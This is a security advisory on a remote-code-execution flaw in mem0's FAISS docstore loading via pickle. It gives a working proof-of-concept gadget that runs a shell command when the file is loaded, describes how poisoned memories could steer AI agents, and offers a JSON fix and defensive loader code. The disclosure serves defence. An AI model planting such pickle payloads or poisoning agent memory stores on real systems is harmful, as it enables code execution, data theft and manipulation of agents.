mem0: RCE via pickle.load() on FAISS Vector Store Docstore
Vulnerability Type
CWE-502: Deserialization of Untrusted Data
Severity
High: pickle.load() on the FAISS docstore file executes arbitrary code at load time, so anyone who can write to the persist directory (or supply a crafted one) gets code execution in the mem0 process.
Affected Code
File: mem0/vector_stores/faiss.py
Line: 94
```python
def _load(self, index_path, docstore_path):
    try:
        self.index = faiss.read_index(index_path)
        with open(docstore_path, "rb") as f:
            self.docstore, self.index_to_id = pickle.load(f)  # <-- RCE: unpickles an attacker-writable file
    except Exception as e:
        logger.warning(f"Failed to load FAISS index: {e}")
```
Steps to Reproduce
- Create a mem0 instance with the FAISS vector store and persist one memory:

```python
from mem0 import Memory

m = Memory.from_config({"vector_store": {"provider": "faiss", "config": {"path": "/tmp/mem0_test"}}})
m.add("test memory", user_id="user1")
```

- Replace the docstore pickle file with a crafted one. The (docstore, index_to_id) tuple matches the shape _load() unpacks, and __reduce__ makes pickle call os.system during loading; the MemoryPoison class itself never has to exist on the victim, only the callable it names:

```python
import os
import pickle

class MemoryPoison:
    def __reduce__(self):
        return (os.system, ("id > /tmp/mem0_pwned",))

with open("/tmp/mem0_test/docstore.pkl", "wb") as f:
    pickle.dump(({"poisoned": MemoryPoison()}, {}), f)
```

- Restart mem0 or otherwise trigger a load of the index: _load() calls pickle.load(), the payload runs, and /tmp/mem0_pwned is written. Because os.system returns normally, the load completes without raising and the surrounding except clause logs nothing.
AI Impact (10x Multiplier)
mem0 is an AI memory layer that agents use for long-term memory, so compromising it compounds:
- Memory poisoning: inject false memories that steer agent behavior on every later turn
- Data exfiltration: RCE in the mem0 process exposes all stored memories across all users
- Cross-user attacks: in multi-tenant deployments that share a persist directory, one user's memory file poisons another's
Suggested Fix
```python
import json

with open(docstore_path, "r", encoding="utf-8") as f:
    data = json.load(f)
self.docstore = data["docstore"]
# JSON object keys are always strings; restore integer keys if
# index_to_id is keyed by FAISS positions.
self.index_to_id = {int(k): v for k, v in data["index_to_id"].items()}
```

The save path must write the same JSON layout, and docstore entries must be JSON-serializable. As defence in depth regardless of format, the persist directory should be writable only by the mem0 process owner.
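The following is an added example, not mem0's code and not part of the original advisory. It reproduces the PoC's __reduce__ gadget with a harmless, observable payload (it sets an environment variable instead of calling os.system), shows that plain pickle.load() runs it while a globals-refusing Unpickler does not, and round-trips a docstore through the suggested JSON layout with integer keys restored. The {"docstore", "index_to_id"} JSON layout, the DocstoreUnpickler class and the file name docstore.json are assumptions for illustration; mem0's real on-disk names may differ.

```python
"""Added example, not mem0's code: the PoC's unpickle gadget beside two safer
loaders. The JSON layout, DocstoreUnpickler and file name are assumptions."""
import io
import json
import os
import pickle
import tempfile

MARKER = "MEM0_POISON_RAN"  # constructed, observable stand-in for a real payload


class MemoryPoison:
    """Same technique as the advisory's PoC (os.system there). __reduce__ tells
    pickle to call an arbitrary callable at load time; the victim never needs
    this class, only the callable it names (here builtins.exec)."""

    def __reduce__(self):
        return (exec, (f"import os; os.environ['{MARKER}'] = '1'",))


def payload_ran() -> bool:
    return os.environ.get(MARKER) == "1"


def build_poisoned_docstore() -> bytes:
    # Same (docstore, index_to_id) tuple shape that mem0's _load() unpacks.
    return pickle.dumps(({"poisoned": MemoryPoison()}, {}))


def vulnerable_load(blob: bytes):
    """What _load() effectively does: pickle.load on a file this process did
    not write. Merely loading runs the gadget."""
    return pickle.loads(blob)


class DocstoreUnpickler(pickle.Unpickler):
    """Defence in depth if pickle must stay: refuse to resolve any global.
    A docstore made only of dict/list/str/int/float needs no globals, so a
    find_class call means the file carries code, not data."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing to import {module}.{name}")


def restricted_load(blob: bytes):
    return DocstoreUnpickler(io.BytesIO(blob)).load()


def save_docstore_json(path: str, docstore: dict, index_to_id: dict) -> None:
    """Write side of the suggested JSON fix; entries must be JSON-serializable."""
    with open(path, "w", encoding="utf-8") as f:
        json.dump({"docstore": docstore, "index_to_id": index_to_id}, f)


def load_docstore_json(path: str):
    """Read side of the fix. JSON object keys are always strings, so integer
    FAISS positions in index_to_id are restored explicitly."""
    with open(path, "r", encoding="utf-8") as f:
        data = json.load(f)
    index_to_id = {int(k): v for k, v in data["index_to_id"].items()}
    return data["docstore"], index_to_id


def demo() -> dict:
    """Runs all three loaders against constructed inputs and reports what happened."""
    results = {}
    blob = build_poisoned_docstore()

    os.environ.pop(MARKER, None)
    vulnerable_load(blob)
    results["vulnerable_executed_payload"] = payload_ran()  # True

    os.environ.pop(MARKER, None)
    try:
        restricted_load(blob)
        results["restricted_refused"] = False
    except pickle.UnpicklingError:
        results["restricted_refused"] = True
    results["restricted_executed_payload"] = payload_ran()  # False

    # The restricted loader still accepts a genuine, globals-free docstore.
    benign = ({"m1": {"data": "test memory", "user_id": "user1"}}, {0: "m1"})
    results["restricted_loads_benign"] = restricted_load(pickle.dumps(benign)) == benign

    # JSON round trip: same data, no code path at all, integer keys preserved.
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "docstore.json")
        save_docstore_json(path, benign[0], benign[1])
        results["json_round_trip"] = load_docstore_json(path) == benign
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Two caveats when applying the restricted loader to the real _load(): its broad except Exception would downgrade the refusal to a warning and leave the store empty, so the refusal should be logged as an error or fail the load; and a refusal in the logs is itself a detection signal worth alerting on, since a legitimate docstore never triggers find_class.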
Invariant Violated
S16 (DeserializationGuard) + S14 (MemoryInputValidation)